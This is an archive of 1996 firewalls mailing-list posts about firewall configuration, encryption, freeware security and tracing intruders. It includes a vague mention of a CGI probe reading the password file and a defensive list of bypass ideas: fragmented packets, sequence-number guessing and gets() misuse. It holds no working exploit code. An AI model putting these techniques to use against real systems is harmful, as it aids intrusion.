Jul 12 16:19:08 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA09087 for firewalls-outgoing; Fri, 12 Jul 1996 16:01:53 -0700 (PDT) Received: from kimberlite.wwonline.com (kimberlite.wwonline.com [206.47.108.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id QAA09015 for ; Fri, 12 Jul 1996 16:01:32 -0700 (PDT) Received: from kimberlite.wwonline.com (ts04p02.wwonline.com [206.47.108.179]) by kimberlite.wwonline.com (8.7.5/8.7.2) with SMTP id SAA03704 for ; Fri, 12 Jul 1996 18:57:14 -0400 (EDT) Date: Fri, 12 Jul 1996 18:57:14 -0400 (EDT) Message-Id: <199607122257.SAA03704@kimberlite.wwonline.com> X-Sender: bhalla@wwonline.com X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.COM From: N Bhalla Subject: CGI Security Leak !! Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, A few days back .. may be a week or so i saw a part of a syslog that mentioned something about some script that was trying to obtain access for the password files .. it contained the part of %/etc/password% something like that i would appreciate if someone could repost that and any blocks against that .. as i would like to block it of my system, Thanks Nishchal From firewalls-owner Fri Jul 12 16:54:01 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA16173 for firewalls-outgoing; Fri, 12 Jul 1996 16:38:46 -0700 (PDT) Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id QAA16021 for ; Fri, 12 Jul 1996 16:38:13 -0700 (PDT) Received: from darkwing.pacific.net.sg by relay2.UU.NET with SMTP Received: (qmail-queue invoked from smtpd); 12 Jul 1996 05:28:32 -0000 Received: from darkwing.pacific.net.sg (203.120.89.89) Date: Fri, 12 Jul 1996 13:28:32 +0800 (SST) From: Ng Pheng Siong To: Matthew Keenan cc: BVE , firewalls@GreatCircle.COM Subject: Re: Dirty Dogs In-Reply-To: <199607120427.OAA03656@shekel.firstpac.com.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 12 Jul 1996, Matthew Keenan wrote: > and try snmp probing the routers closest to the target address. Querying whois and dns is one thing, but some sites might conceive your probing their routers as hostile action. For the list: Would you? Would you detect it? ;) Cheers. - PS -- Ng Pheng Siong * Finger for PGP key. Pacific Internet Pte Ltd * Singapore Fast, secure, cheap. Pick two. From firewalls-owner Fri Jul 12 17:02:46 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA17762 for firewalls-outgoing; Fri, 12 Jul 1996 16:48:58 -0700 (PDT) Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id QAA17741 for ; Fri, 12 Jul 1996 16:48:51 -0700 (PDT) Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id QAA23102; Fri, 12 Jul 1996 16:45:38 -0700 (PDT) From: Don Lewis Message-Id: <199607122345.QAA23102@salsa.gv.ssi1.com> Date: Fri, 12 Jul 1996 16:45:38 -0700 In-Reply-To: Bill Stout X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: Bill Stout , Firewalls@GreatCircle.COM Subject: Re: Freeware Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Jul 12, 9:03am, Bill Stout wrote: } Subject: Re: Freeware } If you don't know what you're doing with a freeware package, } or if the package has not been updated recently, it is dangerous. This is true of commercial packages as well. We happen to own some pieces of hardware containing Sparc CPUs that run SunOS 4.0.3e. Any guesses as to how many security holes there are in 4.0.3e? The hardware vendor went belly up, so no OS upgrades are available, there haven't been security patches from Sun in years, we have no access to source code to fix bugs, and we don't even have the kernal .o files so we can't build new kernals. Good thing I'm not trying to use one of these for a firewall, eh? --- Truck From firewalls-owner Fri Jul 12 17:47:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA22373 for firewalls-outgoing; Fri, 12 Jul 1996 17:44:44 -0700 (PDT) Received: from maryann.ebs.net (maryann.ebs.net [204.254.158.8]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id RAA22366 for ; Fri, 12 Jul 1996 17:44:39 -0700 (PDT) Received: (from uucp@localhost) by maryann.ebs.net (8.7.5/8.6.9) id TAA06845 for ; Fri, 12 Jul 1996 19:46:24 -0500 Received: from gilligan.ebs.net(204.254.158.13) by maryann.ebs.net via smap (V1.3) Date: Fri, 12 Jul 1996 19:45:56 -0500 (CDT) From: Craig Brozefsky To: firewalls@GreatCircle.COM Subject: IP Masquerading and vulnerabilities Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I would like to open a discussion on attacks thru various firewall implementations, in particularly Linux/FreeBSD boxes with either IP Filter or ipfirewall.c doing filtering and masquerading and then redirecting pors to local ports to handle some more complex proxies. I have a 2.0.X Linux kernel running this now and am looking at putting together a system I can use as a firewall with some reliability. here are some ideas of possible attacks and I would like comments ontheir feasability and wether they are being performed presently and if their are fixes: 1. Fragmenting packets so that port information is passed in second packet and the filter only looks at first so it lets it go thru. I know this is a possibility with various packet filtering firewalls on the market now. Linux 2.0 has an option to re-assemble all fragmented packets going thru it before applying the filter which stops it. 2. A sequence number guessing attack (what kidn of sequence number generators do the various OSs have?) 3. Stupid use of gets() Stoopid configurations don't really count either 8) Craig Brozefsky cosmo@ebs.net System Administrator vox: 312-226-1675 EBS.NET fax: 312-226-1677 Network Consulting http://www.ebs.net From firewalls-owner Fri Jul 12 18:17:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA23351 for firewalls-outgoing; Fri, 12 Jul 1996 18:06:46 -0700 (PDT) Received: from relay6.UU.NET (relay6.UU.NET [192.48.96.16]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id SAA23324 for ; Fri, 12 Jul 1996 18:06:37 -0700 (PDT) From: mdr@vodka.sse.att.com Received: from ihgw2.att.com by relay6.UU.NET with SMTP Received: from vodka.sse.att.com by ihig2.att.att.com (SMI-8.6/EMS-1.2 sol2) Message-Id: <199607121603.LAA17766@ihig2.att.att.com> Subject: Open Market To: allyn@allyn.com (Mark Allyn 206-860-9454) Date: Fri, 12 Jul 1996 12:08:59 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: <199607120238.TAA04199@mark.allyn.com> from "Mark Allyn 206-860-9454" at Jul 11, 96 07:38:18 pm X-Mailer: ELM [version 2.4 PL23-upenn2.7] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does anyone have any experiences to report about the Open Market product? Opinions are also welcomed. Mark Riggins Secure Systems Engineering AT&T Bell Labs From firewalls-owner Fri Jul 12 18:52:16 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA25186 for firewalls-outgoing; Fri, 12 Jul 1996 18:40:40 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id SAA25178 for ; Fri, 12 Jul 1996 18:40:33 -0700 (PDT) Received: from smtp1.sybase.com (sybgate) by halon.sybase.com (5.x/SMI-SVR4/SybFW4.0) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) Received: by notesgw2.sybase.com (5.x/SMI-4.1/SybEGW3.3) Message-Id: <9607130137.AA12840@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id To: Darwin Martinez Cc: firewalls From: Ryan.Russell/SYBASE Date: 12 Jul 96 18:38:05 EDT Subject: Re: RealAudio2 X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Set the client machine to use TCP instead. Ryan ---------- Previous Message ---------- To: firewalls cc: From: Darwin_Martinez @ INS.COM (Darwin Martinez) @ smtp Date: 07/12/96 01:08:12 PM Subject: RealAudio2 All: I've upgraded FW-1 to ver 2.1 for supporting real audio 2. I see the "radio" tcp connect go out, but FW-1 is blocking the return udp service. My rulebase is setup to allow tcp / udp real audio, but I'm still blocking it. Anyone using FW-1 & real audio? IF so, I'd appreciate any suggestions. Thanks in advance. ------------------------------------------------------------------------ Darwin L. Martinez Email: darwin_martinez@ins.com Network Systems Engineer Site #: 404-843-5954 International Network Services Pager: 800-INS-1-INS Atlanta Office "To run with the big dogs, you gotta get off the porch!" ------------------------------------------------------------------------ From firewalls-owner Fri Jul 12 19:02:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA26533 for firewalls-outgoing; Fri, 12 Jul 1996 18:58:56 -0700 (PDT) Received: from mail.rc.toronto.on.ca ([207.6.29.231]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id SAA26526 for ; Fri, 12 Jul 1996 18:58:49 -0700 (PDT) Received: by mail.rc.toronto.on.ca with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.979.0) Message-ID: From: Russ To: "'mdr@vodka.sse.att.com'" Cc: "'Firewalls@GreatCircle.COM'" Subject: RE: Web Server on DMZ Date: Fri, 12 Jul 1996 21:53:32 -0400 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.979.0 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Bob, Could you explain to me how you get your two firewall configuration to provide backup services in the event that one of them fails? Are you suggesting that either of the two firewalls fail open? In simple terms, if Firewall #1 (exposed to the Internet) is configured; - to route packets from the Internet to Firewall #2 and/or Application Servers - to route packets from Firewall #2 and/or Application Servers and Firewall #2 (exposed to the internal net) is configured; - to route packets from the internal net to Firewall #1 and/or Application Servers - to route packets from Firewall #1 and/or Application Servers Then how does this configuration work if either of these Firewalls die? If Firewall #1 dies closed (as it should), then Firewall #2 has nowhere to send or receive packets from, and vice versa. I fail to see how having two firewalls could be configured to add anything to the security model while affording you any form of redundency. Cheers, Russ ...running MS Exchange Server 4.0 on NT 4.0, the future is here now. > From firewalls-owner Fri Jul 12 19:17:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA27157 for firewalls-outgoing; Fri, 12 Jul 1996 19:06:36 -0700 (PDT) Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id TAA27137 for ; Fri, 12 Jul 1996 19:06:27 -0700 (PDT) Received: from clark.net (proberts@clark.net [168.143.0.7]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id WAA17175; Fri, 12 Jul 1996 22:03:18 -0400 (EDT) Received: from localhost (proberts@localhost) by clark.net (8.7.1/8.7.1) with SMTP id WAA25413; Fri, 12 Jul 1996 22:03:16 -0400 (EDT) X-Authentication-Warning: clark.net: proberts owned process doing -bs Date: Fri, 12 Jul 1996 22:03:16 -0400 (EDT) From: "Paul D. Robertson" To: Ginger cc: firewalls@GreatCircle.COM Subject: Re: Who should Handle Data Encryption? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 12 Jul 1996, Ginger wrote: > Would anyone like to share your experience regarding secure data transfer on > the Internet/Intranet: > > Should our network people set up secure (i.e., data encryption) > communication channels for all protocols, or should mainly install a file > encryption utility and let the user decided which application is necessary > to be encrypted? Secure communications channels, and secure data storage can be two different things totally. Securing the channel doesn't secure the machine, unless the machine *only* accepts encryped data. Even then, physical security of the machine is paramont. Securing the data at the application level only makes sense if you can ensure that it will be transmitted that way between machines. Issues to consider: Key change: Application users are going to need a lot of education to ensure that keychange intervals are correct, and that key management is handled propperly (Can they deal with good password management? If not, forget key handling). Key escrow: Will your CFO walk off the job with the only copy of the key for your financials at a really bad time? Re-keying a communications channel can be much easier to recover from than trying to recover applicaions data. Compartmentalization: If the communications channel is encrypted, then anyone with the key gets _all_ the data in that channle, not just one application. Also, the network folks hold all the cookies. While this is generally true of a clear channel, depending on the nature of the data, it could be important to you. I'd seriously consider both options. Key application data could be encrypted at the application level, but be cautious about keys, both too many people having them, and not enough. Encrypting all network traffic on key segments, or across less secure paths gives better security against intrusion, data sniffing, and the like. Just like a firewall, you'll want to eliminate, or minimize (depending on the risk you are willing to assume) the paths around the encrypted channel. Calculating good key change intervals for bulk channel encryption may be difficult, but if you're going to a lot of traffic across them, be aware of their vulnerability to differential attacks, and in the case of intranet traffic using normal protocols, known plaintext attacks (eg. the string 'http://'). Finally, though encryption is a _very_good_thing_ [tm], it isn't a magic bullet, and you don't loose all your vulnerabilities, so don't drop your guard down. Also, key intervals, key change mechanisms, algorithm implementation, key length, and key invalidation are all new potential vulnerabilities that you should be aware of managing. Hope this helps some. Paul ----------------------------------------------------------------------------- Paul D. Robertson "My statements in this message are personal opinions proberts@clark.net which may have no basis whatsoever in fact." PSB#9280 From firewalls-owner Fri Jul 12 20:48:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA02527 for firewalls-outgoing; Fri, 12 Jul 1996 20:45:40 -0700 (PDT) Received: from io.org (io.org [198.133.36.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id UAA02520 for ; Fri, 12 Jul 1996 20:45:34 -0700 (PDT) Received: from eagle.net4.io.org (eagle.net4.io.org [199.166.239.227]) by io.org (8.6.12/8.6.12) with SMTP id XAA02275; Fri, 12 Jul 1996 23:42:18 -0400 Date: Fri, 12 Jul 1996 23:42:18 -0400 Message-Id: <199607130342.XAA02275@io.org> X-Sender: jeffm@io.org X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: Jefferson Mousseau Subject: Ciscos & HTTP Config Cc: 102547.232@CompuServe.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Recently we were configuring a Cisco 2503 to allow http on port 80 but when we tested it, nothing would go through. Next we opened up the router and were able to access the web server (MS IIS). I recalled that many web browsers use up to 4 ports and according to Netscape, more port utilization is intended in later releases. Finally we configed the router to allow http from port 80 - 90 and tests allowed us to access the web server. Oddly, our firewall is FireWall-1 2.0 and it knew (as if it can think!) to keep more than port 80 open. I was wondering if anyone else has encountered this and what range of ports they opened on the Cisco for incoming access? Also, what range of ports does FireWall-1 open for http? Regards Jeff Mousseau jeffm@io.org From firewalls-owner Fri Jul 12 21:02:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA02712 for firewalls-outgoing; Fri, 12 Jul 1996 20:50:47 -0700 (PDT) Received: from cuugnet.cuug.ab.ca (cuugnet.cuug.ab.ca [206.75.222.4]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id UAA02705 for ; Fri, 12 Jul 1996 20:50:41 -0700 (PDT) Received: by cuugnet.cuug.ab.ca (AIX 4.1/UCB 5.64/4.03-CUUG-02) Date: Fri, 12 Jul 1996 21:47:39 -0600 From: ingoldsb@cuug.ab.ca (Terry Ingoldsby 630-5931) Message-Id: <9607130347.AA35632@cuugnet.cuug.ab.ca> To: firewalls@greatcircle.com Subject: Canadian companies also limited from exporting encryption? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Date: Thu, 11 Jul 1996 13:09:03 -0500 >From: Jim Minie >Subject: RE: CISCO network level encryption & key lengths >Canadian companies whose encryption methodologies can't be regulated by the >U.S. State Department are doing a brisk business within the U.S. and >maintaining that level of security throughout the world. >I.e. Nortel Entrust. Maybe not falling in line with Cisco, but an >alternate... Have you considered Virtual Private Networking via a firewall >system to create the distinct user groups? It's just an idea. If you're >talking individual users the cost would be way out of line. Are you sure this is correct? I thought that Canada got access to US encryption technology by agreeing to abide by the US export restrictions - but maybe that only applies to technology imported from the states. However, I was told that Nortel Entrust is only allowed to do international encryption *if* the key server is kept in North America. Can anyone confirm/refute this? - Terry Ingoldsby ingoldsb@dcexpert.ab.ca it happen this year? Probably not. From firewalls-owner Fri Jul 12 21:32:40 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA04017 for firewalls-outgoing; Fri, 12 Jul 1996 21:14:21 -0700 (PDT) Received: from kimberlite.wwonline.com (kimberlite.wwonline.com [206.47.108.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id VAA03991 for ; Fri, 12 Jul 1996 21:14:10 -0700 (PDT) Received: from kimberlite.wwonline.com (ts04p14.wwonline.com [206.47.108.191]) by kimberlite.wwonline.com (8.7.5/8.7.2) with SMTP id AAA12526 for ; Sat, 13 Jul 1996 00:09:45 -0400 (EDT) Date: Sat, 13 Jul 1996 00:09:45 -0400 (EDT) Message-Id: <199607130409.AAA12526@kimberlite.wwonline.com> X-Sender: bhalla@wwonline.com X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.COM From: N Bhalla Subject: Encryption .. May be i am asking at the wrong place Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I was wondering I have read and heard a lot about pgp being the best package for data encyption which i do believe as well.. But why are people still using other data encryption pacakages .. Why can't the unix password etc be also encrypted in PGP Why can't the cellular phones whose numbers are being tracked down by scanners not be encrypted in pgp .. Am i just imaganing about the power of pgp or is it so powerfull .. Why can't we have pgp for firewalls .. etc .. Please pardon me for asking in the wrong place ... Thanks From firewalls-owner Fri Jul 12 21:45:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA02849 for firewalls-outgoing; Fri, 12 Jul 1996 20:56:37 -0700 (PDT) Received: from orion.webspan.net (orion.webspan.net [206.154.70.41]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id UAA02842 for ; Fri, 12 Jul 1996 20:56:31 -0700 (PDT) Received: from orion.webspan.net (scanner@orion.webspan.net [206.154.70.41]) by orion.webspan.net (8.7.5/8.6.12) with SMTP id XAA02909; Fri, 12 Jul 1996 23:51:59 -0400 (EDT) Date: Fri, 12 Jul 1996 23:51:58 -0400 (EDT) From: Scanner To: Rob Sansom cc: firewalls@GreatCircle.COM Subject: Re: POP exploits In-Reply-To: <199607121541.IAA03298@apu.connectix.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 12 Jul 1996, Rob Sansom wrote: > I occasionally get a burst of TCP packets to port 110 on our web server, > which does not run a pop 3 server or any such thing. Here's a good > example: > I know it's not an employee trying to collect their mail, since all of > these connection attempts have come from places like Malaysia, Washington Hmm Malaysia? any gov.my? or any other .my? I know that there are alot of machines hacked in .my and I know one such person who has attempted with failure over and over and over again to attack my popper port which is wrapped and i cant figure out what the hell he's doing after 20 attempts of geting refused that comes from many malaysia sites. I'm gonna say that most of the conencts I get from .my are hack attempts. Just thought I'd pass that on. -- ===================================| Webspan Inc., ISP Division. FreeBSD 2.1.0 is available now! | Phone: 908-367-8030 ext. 126 -----------------------------------| 500 West Kennedy Blvd., Lakewood, NJ-08701 Turning PCs into Workstations | E-Mail: scanner@webspan.net http://www.freebsd.org | SysAdmin / Network Engineer / Security ===================================| Member BSDNET team! http://www.bsdnet.org From firewalls-owner Sat Jul 13 01:21:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA16110 for firewalls-outgoing; Sat, 13 Jul 1996 01:08:38 -0700 (PDT) Received: from sic.se (mailbox.sic.se [194.236.7.200]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id BAA16102 for ; Sat, 13 Jul 1996 01:08:30 -0700 (PDT) Received: from pamela.sic.se (pamela.sic.se [194.236.7.44]) by sic.se (8.7.5/8.7.2) with SMTP id KAA01626; Sat, 13 Jul 1996 10:03:12 +0200 (MET DST) X-Mailer: InterCon tcpCONNECT4 4.0b26 (Macintosh) MIME-Version: 1.0 Message-Id: <9607131005.AA26848@pamela.sic.se> Date: Sat, 13 Jul 1996 10:05:26 +0100 From: "Stefan Berg" To: "Bruce M." Cc: firewalls@GreatCircle.com Subject: Re: Freeware Content-Type: Text/Plain; charset=US-ASCII Content-Disposition: Inline Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Bruce M. wrote: > On Fri, 12 Jul 1996, Stefan Berg wrote: > > > My experience with freeware or any other firewall software for > > that matter is that it very much depends on _configuration_ rather > > than the quality of the software. > > I mean, what's the use of a super_duper_mega_expensive_and_ > > great firewall if you don't know hot to set it up in a secure fashion? > > True. But what is the good of a simple proxy server if it won't > let you implement the types of restrictions and privledges that you > want to allow? Basically, you need a precise mix of both > good configuration and good quality. Some people aren't willing to > pay for both. Good point. A firewall should be like a computer --> a _helpful_ tool, not a limiting one. /Stefan -- _______________________________________________________ Stefan Berg ISDN Group of Sweden / Svenska InternetCentralen Phone: +46-8-667 7010 Fax: +46-8-667 0610 E-mail: stefan@sic.se WWW: http://www.isdn.se/ http://www.sic.se/ _______________________________________________________ Recursive; adj. see Recursive From firewalls-owner Sat Jul 13 02:17:52 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA21889 for firewalls-outgoing; Sat, 13 Jul 1996 01:59:26 -0700 (PDT) Received: from mdisnz.nz.mdis.com ([202.36.234.33]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id BAA21874 for ; Sat, 13 Jul 1996 01:59:11 -0700 (PDT) Received: from x86.nz.mdis.COM by mdisnz.nz.mdis.com with SMTP id AA03851 Received: by x86.nz.mdis.com (SMI-8.6/SMI-SVR4) Date: Sat, 13 Jul 1996 20:51:38 +1200 From: geofft@nz.mdis.com (Geoff Tribble) Message-Id: <199607130851.UAA08773@x86.nz.mdis.com> To: firewalls@greatcircle.com Subject: Re: Dirty Dogs X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Interestingly, traceroutes to machines you would think were the same net end up in different places ! Still points to AOL at the ISP. > > This person seems to have covered their tracks pretty well. Any ideas on > tracking them?? # traceroute 152.169.232.1 19 inet3-gw.blue.aol.com (198.81.0.43) 490 ms 460 ms 500 ms 20 inet5-gw.blue.aol.com (152.163.15.2) 470 ms 430 ms 430 ms 21 inet6-gw.blue.aol.com (152.163.15.26) 460 ms 530 ms 440 ms 22 inet15-gw.blue.aol.com (152.163.15.77) 550 ms 550 ms 560 ms 23 iptr-r3.proxy.aol.com (152.163.193.125) 630 ms 630 ms 550 ms 24 152.169.232.1 (152.169.232.1) 450 ms 610 ms 450 ms #traceroute 152.169.232.79 19 inet3-gw.blue.aol.com (198.81.0.43) 430 ms 620 ms 440 ms 20 inet5-gw.blue.aol.com (152.163.15.2) 430 ms 440 ms 430 ms 21 inet6-gw.blue.aol.com (152.163.15.26) 440 ms 480 ms 440 ms 22 inet15-gw.blue.aol.com (152.163.15.77) 530 ms 460 ms 500 ms 23 iptr2-r3.proxy.aol.com (152.163.193.60) 460 ms 630 ms 440 ms 24 152.163.191.121 (152.163.191.121) 450 ms 490 ms 550 ms 25 152.163.191.121 (152.163.191.121) 490 ms !H 520 ms !H 450 ms !H And from nslookup > 152.163.191.121 Name: ipt-i1.blue.aol.com Address: 152.163.191.121 Looks like a dial-in port at AOL but does anyone know what 152.169.232.1 is?? Geoff Tribble McDonnell Information Syatems Auckland New Zealand From firewalls-owner Sat Jul 13 05:17:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA27426 for firewalls-outgoing; Sat, 13 Jul 1996 05:09:56 -0700 (PDT) Received: from fire1.sprintlink.net (fire1.sprintlink.net [206.229.244.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id FAA27419 for ; Sat, 13 Jul 1996 05:09:50 -0700 (PDT) Received: from fire2.int.sprintlink.net ([206.229.244.28]) by fire1.sprintlink.net Received: from athens.int.sprintlink.net ([208.0.2.203]) by fire2.int.sprintlink.net Received: (from rquinn@localhost) by athens.int.sprintlink.net (8.7.5/8.7.3) id IAA04933 for Firewalls@GreatCircle.COM; Sat, 13 Jul 1996 08:06:38 -0400 (EDT) From: Rob Quinn Message-Id: <199607131206.IAA04933@athens.int.sprintlink.net> Subject: Please trim your articles To: Firewalls@GreatCircle.COM Date: Sat, 13 Jul 1996 08:06:38 -0400 (EDT) Reply-To: rquinn@sprint.net In-Reply-To: <199607130404.VAA03298@miles.greatcircle.com> from "Firewalls-Digest" at Jul 12, 96 09:04:32 pm X-Alternate-Address: rjq@phys.ksu.edu Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From: someone on the firewalls list > Subject: Re: Dirty Dogs [11 lines of new text] [64 lines quoted entirely from the last article, with no new comments] When replying to an email/post, please DO NOT quote the entire article at the bottom of your own email! We're all on the list, and we've all seen it ourselves. If you're replying to specific parts of the email, then quote those lines only. If you're wondering why you should care (or change), try subscribing to the firewalls-digest. Your 11 lines of new text are totally lost in the noise you are creating. You might have something new/good to say, but it's too much trouble for us to look for it. Others might know something important to you, but you'll never hear about it because most people don't want to take the effort to search out what you've written. -- | It must be true, Rob Quinn | | I saw it (703)904-2125 | | on tv. rquinn@sprint.net | | Sprint Corporate Security | From firewalls-owner Sat Jul 13 08:05:54 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA01738 for firewalls-outgoing; Sat, 13 Jul 1996 07:55:32 -0700 (PDT) Received: from dfw-ix12.ix.netcom.com (dfw-ix12.ix.netcom.com [206.214.98.12]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA01731 for ; Sat, 13 Jul 1996 07:55:27 -0700 (PDT) Received: from (jgeuin@tal-fl1-03.ix.netcom.com [205.184.150.35]) by dfw-ix12.ix.netcom.com (8.6.13/8.6.12) with SMTP id HAA17334; Sat, 13 Jul 1996 07:50:43 -0700 Date: Sat, 13 Jul 1996 07:50:43 -0700 Message-Id: <199607131450.HAA17334@dfw-ix12.ix.netcom.com> From: jgeuin@ix.netcom.com (James L. Geuin) Subject: Re: Encryption .. May be i am asking at the wrong place To: N Bhalla Cc: jgeuin@netcom.com Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You wrote: > >Hi, > >I was wondering I have read and heard a lot about pgp being the best package >for data encyption which i do believe as well.. > >But why are people still using other data encryption pacakages .. >Why can't the unix password etc be also encrypted in PGP >Why can't the cellular phones whose numbers are being tracked down by >scanners not be encrypted in pgp .. > > >Am i just imaganing about the power of pgp or is it so powerfull .. > >Why can't we have pgp for firewalls .. etc .. > >Please pardon me for asking in the wrong place ... > > >Thanks > > I am also interested in encryption. I have a TCP/IP carrier that is generated by an IPC (interprocess controller) from a UNISYS A series main frame. I travel to around 700 sites, via a PVC frame relay connection. I don't want to encrypt everything, just one or two applications. Have you heard of anything that I could use? Thanks, R/Jim Px From firewalls-owner Sat Jul 13 08:17:47 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA02288 for firewalls-outgoing; Sat, 13 Jul 1996 08:05:52 -0700 (PDT) Received: from xioa.cosmic.org (xioa.cosmic.org [206.151.181.200]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id IAA02275 for ; Sat, 13 Jul 1996 08:05:45 -0700 (PDT) Received: (from jwb@localhost) by xioa.cosmic.org (8.6.12/8.6.9) id LAA20816 for Firewalls@GreatCircle.COM; Sat, 13 Jul 1996 11:07:58 GMT From: Joe Beiter Message-Id: <199607131107.LAA20816@xioa.cosmic.org> Subject: Sun Firewall software To: Firewalls@GreatCircle.COM Date: Sat, 13 Jul 1996 11:07:52 +0000 () In-Reply-To: <199607130800.BAA15923@miles.greatcircle.com> from "Firewalls-Digest" at Jul 13, 96 01:00:30 am X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Anyone know the name of that new Firewall software for Suns? Know if it is any good? :---==@==---==@==---==@==---: Joseph Beiter Hacking's just another word for nothing jwb@cosmic.org left to kludge. From firewalls-owner Sat Jul 13 09:32:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA06595 for firewalls-outgoing; Sat, 13 Jul 1996 09:19:53 -0700 (PDT) Received: from brite.wichita.brite.com (brite.wichita.brite.com [151.214.1.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA06582 for ; Sat, 13 Jul 1996 09:19:41 -0700 (PDT) Received: from usrpc10.wichita.brite.com by brite.wichita.brite.com (5.65/1.35) Date: Sat, 13 Jul 96 11:09:26 CDT From: Shane T Kinsch Subject: RE: Dirty Dogs To: "'Matthew Keenan'" Cc: "'Firewalls'" X-Mailer: Chameleon V0.05, TCP/IP for Windows, NetManage Inc. Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 12 Jul 1996 08:48:20 -0400 Russ wrote: >Anyone got any ideas as to how we can make AOL more 